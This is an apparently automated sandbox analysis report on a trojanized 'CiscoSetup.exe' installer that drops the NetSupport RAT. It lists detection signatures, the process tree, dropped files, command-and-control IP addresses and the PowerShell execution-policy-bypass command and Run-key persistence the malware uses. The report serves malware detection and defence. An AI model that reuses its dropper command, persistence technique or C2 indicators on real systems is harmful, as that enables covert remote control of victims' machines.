Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CiscoSetup.exe

Overview

General Information

Sample name:CiscoSetup.exe
Analysis ID:1546660
MD5:446a85d94adb8e2e9157170b82592d6a
SHA1:1ea726940904e568dbdc4a6ef50b61cae6bb55ea
SHA256:65110470f6c6c96877e96a640adcf6178186b675e6d1bc24c19f977a12220294
Tags:exeOMICAREJOINTSTOCKCOMPANYuser-SquiblydooBlog
Infos:

Detection

NetSupport RAT, NetSupport Downloader
Score:54
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CiscoSetup.exe (PID: 2196 cmdline: "C:\Users\user\Desktop\CiscoSetup.exe" MD5: 446A85D94ADB8E2E9157170B82592D6A)
    • CiscoSetup.tmp (PID: 5500 cmdline: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" MD5: BFD84005E52425F9B8FE658B9663E1C4)
      • powershell.exe (PID: 3412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 4176 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 1112 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 6484 cmdline: "C:\Users\user\AppData\Roaming\Cisco\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\Cisco\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 5 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000000.2495587028.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000A.00000000.2576329982.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000A.00000002.2577820279.0000000000404000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 23 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      10.2.client32.exe.6dec0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        6.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          10.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            9.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              9.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 20 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi32_3412.amsi.csvJoeSecurity_NetSupportDownloaderYara detected NetSupport DownloaderJoe Security
                                  amsi32_3412.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                  • 0x2e4f74:$b1: ::WriteAllBytes(
                                  • 0x2e4f3e:$b2: ::FromBase64String(
                                  • 0x2f16a0:$s1: -join
                                  • 0x2eae4c:$s4: +=
                                  • 0x2eaf0e:$s4: +=
                                  • 0x2ef135:$s4: +=
                                  • 0x2f1252:$s4: +=
                                  • 0x2f153c:$s4: +=
                                  • 0x2f1682:$s4: +=
                                  • 0x2f4e98:$s4: +=
                                  • 0x2f4f9c:$s4: +=
                                  • 0x2f83f8:$s4: +=
                                  • 0x2f8ad8:$s4: +=
                                  • 0x2f8f8e:$s4: +=
                                  • 0x2f8fe3:$s4: +=
                                  • 0x2f9257:$s4: +=
                                  • 0x2f9286:$s4: +=
                                  • 0x2f97ce:$s4: +=
                                  • 0x2f97fd:$s4: +=
                                  • 0x2f98dc:$s4: +=
                                  • 0x2fbb73:$s4: +=

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe
                                  Sigma detected: Suspicious Script Execution From Temp Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe
                                  Sigma detected: Change PowerShell Policies to an Insecure Level
                                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Cisco\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp
                                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3412, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp, ParentProcessId: 5500, ParentProcessName: CiscoSetup.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1", ProcessId: 3412, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  barindex
                                  Sigma detected: Powershell drops NetSupport RAT client
                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3412, TargetFilename: C:\Users\user\AppData\Roaming\Cisco\NSM.LIC

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-01T12:11:19.931659+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649748TCP
                                  2024-11-01T12:12:00.477050+010020229301A Network Trojan was detected20.12.23.50443192.168.2.660861TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-01T12:10:58.103251+010028277451Malware Command and Control Activity Detected192.168.2.660703151.236.16.15443TCP
                                  2024-11-01T12:10:58.103251+010028277451Malware Command and Control Activity Detected192.168.2.660707199.188.200.195443TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110AC820
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,9_2_110AC820
                                  Source: is-2J155.tmp.2.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d49f9afc-4
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to behavior

                                  Compliance

                                  barindex
                                  EXE planting / hijacking vulnerabilities found
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEXE: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to behavior
                                  Uses 32bit PE files
                                  Source: CiscoSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  PE / OLE file has a valid certificate
                                  Source: CiscoSetup.exeStatic PE information: certificate valid
                                  Uses new MSVCR Dlls
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to behavior
                                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                                  Source: CiscoSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Binary contains paths to debug symbols
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000006.00000002.4600795851.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000009.00000002.2498300418.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2580406925.000000006DEC2000.00000002.00000001.01000000.0000000C.sdmp, PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb&&&GCTL source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000004.00000002.2458265497.000000000756A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\Win32\Release\InstallHelper.pdb source: is-H5812.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\ApiShim\Win32\Release\vpnapishim.pdb...GCTL source: is-V8S0O.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdb source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Phoenix\third-party\libcurl\out.win.7.x86\curl-7.84.0\builds\libcurl-vc-x86-release-dll-ssl-dll-ipv6-sspi-obj-lib\accurl.pdb source: is-2J155.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\WebHelper\Plugin\Win32\Release\acwebhelper.pdb source: is-S9VDU.tmp.2.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdb source: is-2TJID.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdbGCTL source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.4600362190.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2498047838.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2580034650.0000000068B31000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2409667962.0000000003148000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\proj_Phoenix_VS20190.730599493905\proj_Phoenix_VS2019\vpn\VA\NDIS6\x64\Release\vpnva64-6.pdb source: is-EUMLH.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\InstallHelper\x64\Release\InstallHelper64.pdb; source: is-KLEUG.tmp.2.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-VTDA9.tmp.2.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\PhoneHome\Win32\Release\acfeedback.pdbMM/GCTL source: is-2TJID.tmp.2.dr
                                  Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\vccorlib140.i386.pdbGCTL source: is-OJMRD.tmp.2.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000006.00000002.4600671174.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000009.00000002.2498203499.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2580255021.0000000068BF5000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,6_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,6_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 6_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102D059 PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D059
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1102CEB1 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CEB1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,9_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11107FE0
